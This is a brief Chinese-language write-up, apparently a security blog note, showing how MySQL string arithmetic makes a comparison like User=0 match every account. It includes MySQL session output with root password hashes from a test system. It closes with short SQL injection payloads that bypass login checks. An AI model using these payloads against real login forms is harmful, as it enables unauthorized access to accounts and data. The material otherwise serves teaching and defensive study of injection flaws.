测试平台: backtrack r3x86
MYSQL版本: mysql-5.1.63
mysql> select User,Password from user where User=0;
+------------------+-------------------------------------------+
| User | Password |
+------------------+-------------------------------------------+
| root | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| debian-sys-maint | *8C4C424D182238AFBA8B217F692D07C952EF4087 |
+------------------+-------------------------------------------+
4 rows in set, 4 warnings (0.00 sec)
mysql> select User,Password from user where User='';
Empty set (0.00 sec)
mysql> select User,Password from user where User=NULL;
Empty set (0.01 sec)
mysql> select 'w'-'w';
+---------+
| 'w'-'w' |
+---------+
| 0 |
+---------+
1 row in set, 2 warnings (0.00 sec)
mysql> select "w"-"w";
+---------+
| "w"-"w" |
+---------+
| 0 |
+---------+
1 row in set, 2 warnings (0.01 sec)
光看上面的warnings有人可能不信,特作下面的验证.
Query OK, 1 row affected, 2 warnings (0.01 sec)
Records: 1 Duplicates: 0 Warnings: 0
mysql> describe temptbl;
+-------+--------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------+------+-----+---------+-------+
| coll | double | NO | | 0 | |
+-------+--------+------+-----+---------+-------+
1 row in set (0.01 sec)
能完成数值类型转换的表达式均可, 例如: select username,password from users where username= '' +0;
类似的”+0,”-0,”*0,”^0均可。 精简payload可以绕过登录认证: ‘+0#,’/1#,’^0,’-0#等等。
http://www.xaprb.com/blog/2008/08/13/how-to-emulate-the-typeof-function-in-mysql/
http://blog.kotowicz.net/2013/01/abusing-mysql-string-arithmetic-for.html
http://www.freebuf.com/articles/web/6894.html